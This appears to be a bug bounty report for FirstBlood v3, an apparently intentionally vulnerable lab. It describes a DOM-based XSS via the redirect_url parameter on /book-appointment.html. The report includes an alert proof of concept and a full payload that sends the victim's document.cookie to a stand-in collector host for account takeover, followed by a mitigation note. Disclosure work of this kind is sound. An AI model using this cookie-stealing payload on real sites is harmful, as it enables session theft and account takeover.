FirstBlood-#1126 — DOM-based XSS on /book-appointment.html can lead to account takeover
This issue was discovered on FirstBlood v3
On 2022-12-08, 0xblackbird Level 5 reported:
Summary:
Hi mate!
I hope you're doing well today!
I found a DOM-based XSS vulnerability on book-appointment.html
. This looks like the same cause as the about.html DOM XSS.
Possible cause:
User input that got passed through the return_url query parameter ends up in a DOM sink. We could use the javascript protocol to execute javascript directly in our browser.
Impact:
I was able to execute javascript code on any user's behalf. Even more, I was also able to steal the sensitive session cookie as it is not an HTTPOnly cookie. This allowed me to successfully takeover the account of the doctor.
Steps to reproduce:
Proof of concept: /book-appointment.html?redirect_url=javascript:alert(document.domain)
1) Spin up firstblood v3 if you haven't already
2) Visit the path PoC above
3) An alert popup should appear with the document's domain
Now, if the user is authenticated, we can easily takeover the doctor's account as cookies are not HTTPOnly. To do so, we could use the following payload to steal and send the cookies back to us:
/book-appointment.html?redirect_url=javascript:location.href%3D%60//{BURP_COLLABORATOR}/collector?cookies=${document.cookie}%60
Upon visiting the URL (as the victim), we can see a hit with the cookies on our server:
Mitigation
For DOM-based XSS vulnerabilities, I recommend to not pass raw user input into DOM sinks without proper validation. Use the history.pushState()
method if you want to redirect a user without them ending up somewhere else or having JS executed in their web browser.
Thanks for hosting such an awesome event again!
Kind regards,
0xblackbird
P3 Medium
Endpoint: /book-appointment.html
Parameter: redirect_url
Payload: javascript:alert(document.domain)
FirstBlood ID: 46
Vulnerability Type: Reflective XSS
The endpoint book-appointment.php was introduced to replace book-appointment.html, but code on book-appointment.html introduces an XSS vulnerability via the javascript: URI